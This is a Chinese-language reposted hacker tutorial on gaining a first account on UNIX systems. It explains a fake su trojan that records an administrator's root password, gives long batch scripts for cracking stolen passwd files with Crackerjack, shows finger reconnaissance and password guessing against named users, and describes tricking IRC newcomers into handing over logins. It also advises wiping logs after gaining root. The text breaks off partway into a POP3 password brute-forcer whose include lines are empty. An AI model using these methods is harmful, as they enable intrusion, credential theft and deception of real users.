從UNIX系統(tǒng)獲取密碼檔(二)
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:04:34 作者:佚名
我要評(píng)論

主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個(gè)起始帳號(hào).我將深入每個(gè)方面幫助你開始.你所需的只是一個(gè)好的帳號(hào),用來獲得數(shù)百個(gè)帳號(hào).想一想這:你進(jìn)入一個(gè)很好的可以利用的系統(tǒng)(
主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個(gè)起始帳號(hào).我將深入每個(gè)方面幫助你開始.你所需的只是一個(gè)好的帳號(hào),用來獲得數(shù)百個(gè)帳號(hào).想一想這:你進(jìn)入一個(gè)很好的可以利用的系統(tǒng)(大多是Linux機(jī)器;),奪取root權(quán)限并裝上一個(gè)Sniffer(嗅探器);這個(gè)TCP sniffer 將監(jiān)測(cè)到網(wǎng)絡(luò)上任何login(登陸)過程并記錄下所有Telnet,F(xiàn)tp或撥號(hào)進(jìn)出的Login 名和口令;這樣即使是一個(gè)小以太網(wǎng)你也可獲得大約100個(gè)口令,如果是一個(gè)更大的網(wǎng)絡(luò)供應(yīng)商你就會(huì)得到全世界的數(shù)百個(gè)帳號(hào)!這一切,你只要有某個(gè)可利用系統(tǒng)的一個(gè)好帳號(hào)和口令就可做到!如果你看起來無法利用某系統(tǒng)的root權(quán)限,那就拿它來破解口令,用來和那些但沒有shell帳號(hào)或磁盤空間的其他hacker及IRC使用者交換.決不要把一個(gè)你有root權(quán)限的系統(tǒng)的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個(gè)帳號(hào)的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運(yùn)行破解程序直到得到一個(gè)可以進(jìn)入此系統(tǒng)的好帳號(hào).然后Login上去看看能否奪取系統(tǒng)的root權(quán)限.如果可以,拿了root,移取用得著的文檔到你的子目錄里,抹去你的在場(chǎng)痕跡,清除所有日志.這樣就準(zhǔn)備好可以安裝Sniffer了.
為何要去破解那些只用24小時(shí)就可破解出大部分口令的系統(tǒng)?我們的目的不僅僅是正在hack的機(jī)器,還有那些與之相連的機(jī)器.如果某系統(tǒng)沒有利用價(jià)值,不要在它上面浪費(fèi)時(shí)間,去尋找下一個(gè)目標(biāo).后注:如果你僅僅是為了得到上面所說的交換帳號(hào)的口令那又另當(dāng)別論.
得到一個(gè)管理員的帳號(hào)后,你可能會(huì)想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑里所有目錄之前.把偽SU程序放在該.term(或其他)目錄里.他鍵下SU,對(duì)他來說一切都如常,在提示下他鍵入root口令,然后口令就悄悄地被拷貝到/tmp/.elm69的log文檔里,同時(shí)刪除偽SU文件,并返回一個(gè)摽諏畬頂?shù)男畔⒆屗僭囈淮危芾韱T一定認(rèn)為是他輸入錯(cuò)了,便再次運(yùn)行SU,但這回是真的SU了.
在后面的uuencode過的附錄里,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權(quán)限的用戶帳號(hào)上,此前你應(yīng)已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除并在第二次嘗試讓真SU程序運(yùn)行.
3.把所有文件放進(jìn)目標(biāo)目錄,并編譯su.c.
gcc su.c -o su
然后刪除SU以外的所有文件.一切搞定!
.bash_profile 結(jié)構(gòu)如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改為:PATH=$HOME/.term:$PATH:$HOME/bin
當(dāng)系統(tǒng)管理員運(yùn)行SU時(shí),就會(huì)先運(yùn)行在.term里的SU特洛伊然后報(bào)告口令出錯(cuò).SU特洛伊程序會(huì)在/tmp目錄創(chuàng)建包含鍵入的root口令(或帳戶口令)的隱藏文件.如果是非root帳戶,它還記錄帳戶名.然后SU特洛伊自我刪除使得下次嘗試將運(yùn)行真正的SU程序.
你可在/etc目錄下的passwd文檔前部找到管理員的用戶名.只需打:more passwd
你可確信passwd文檔的頭一二個(gè)帳戶就是管理員的,雖然有時(shí)你也能找到其他人的目錄如/staff/username.
歷史文檔在每個(gè)用戶目錄里.通過閱讀它們,你可看到該用戶最近使用過的命令,有時(shí)能看到最近的100多個(gè)命令.尋找.bash_history或history文件,你可用more命令讀它們:more .bash_history,也可:more .b*或more .b(然后按鍵盤上的Tab鍵).
OK,現(xiàn)在你需要一個(gè)好的password破解程序.下一章你可看到在沒有帳號(hào)時(shí)如何從系統(tǒng)奪取password文檔.但是it is catch 22(我不懂了?:譯者),你還是要用到password破解程序.
你需要下列三樣?xùn)|東:
1. Password破解程序
2. 好的字典檔
3. Password 文檔
初學(xué)者最好的password破解程序當(dāng)數(shù)Crackerjack,搜尋Web頁(yè)可以很容易找到它.Down下來準(zhǔn)備開始.如果你已有所入門,可down一個(gè)unix版本的Cjack并在shell環(huán)境下運(yùn)行它.但如你是初學(xué),down一個(gè)DOS/OS/2版本好了.
此外還要找一些好字典檔.最好的字典檔就是名字(names)了.你會(huì)在網(wǎng)絡(luò)上發(fā)現(xiàn)最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’這樣為名的字典檔是最好的.
裝載crackerjack如:[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文檔作為字典檔.這會(huì)讓你先找出那些用登陸名(Login name)作口令的用戶,如果用真名(real name )或公司名之類的信息的話,也能馬上猜中.這樣你就不用苦苦等候程序搜索整個(gè)字典檔了.
如果想hash(我譯做:擴(kuò)充)字典檔以得到更多的詞量,可參讀crackerjack的DOC文檔.
所謂hashing(擴(kuò)充)就是你可告訴crackerjack更改字典檔中的詞例如在單詞的前后加一些數(shù)字或字母,就象sandy1或1sandy.你會(huì)發(fā)現(xiàn)很多用戶這樣做并以為這更可靠.
下面就是為口令文檔和字典檔寫的hashing文件.通過觀察它們,你就會(huì)明白你如何修改它們或創(chuàng)建新的hashing文件以滿足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
---------------- end of dicthash.bat
---------------- start of jackhash.bat
@echo off
cls
echo - THIS FILE FOR DOS
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
--------------- end of jackhash.bat
即使沒有帳號(hào)也可奪取password文檔,看下一章吧.
--------------------------------------------------------------------------------
與新手交談
還有其他方法不用費(fèi)那么大力就可獲得帳號(hào).在IRC上建一與hacking有關(guān)名字的頻道等候或加入已有的IRC頻道,如:#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
#hackers_hideout,或任何其他你能找到的.
現(xiàn)在你要尋找的就是那些正學(xué)習(xí)和使用shell的新?。W(wǎng)絡(luò)總是會(huì)有一些人沒你知得多的人.留意那些問一些新手問題又得不到答案甚至被踢出頻道的家伙,那就是你的目標(biāo)了:)
用/msg發(fā)消息給他使得其他人看不出你和他交談.然后問他問題,嘗試幫助他,但不必太盡力;).最后告訴他你可為他login上去幫他解決問題.這有可能讓你拿到passwd 文檔或其他東東.應(yīng)承他任何事(promise him the world)以獲取login口令.現(xiàn)在你不就有了起始帳號(hào)可以開始你的學(xué)習(xí)進(jìn)程了.如果在奪取系統(tǒng)的root時(shí)候你不想暴露自己,可告訴他其他吸引他的東東讓他在你偵聽系統(tǒng)的其他口令時(shí)忙著.
因此現(xiàn)在如果你在IRC上給某人你的login名和口令時(shí),記住我上面說的話,不過我一直都盡量幫助人們學(xué)習(xí)啦,因此我可以說我對(duì)待碰見的朋友都是真誠(chéng)老實(shí)的.
--------------------------------------------------------------------------------
困難的方法
這是另一種方法.可以確定的說,大多數(shù)的大系統(tǒng)都有用戶在使用不可靠口令.在shell環(huán)境下:
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
現(xiàn)在我們可以嘗試這樣登陸:
Login:chris Passwword 試一試:Chris,chris,myers,Myers,chrismyers,等等…
這個(gè)看起來不錯(cuò):wendt:Catherine:catherine
下面是另一個(gè)命令:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
你有更多可利用的消息了;)
我知道這讓你厭煩...
記住你的嘗試會(huì)被記錄,所以如果你成功進(jìn)入并獲得root權(quán)限的話,記得清除日志:)
以下是一個(gè)成功進(jìn)入后用得著的C小程序.
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
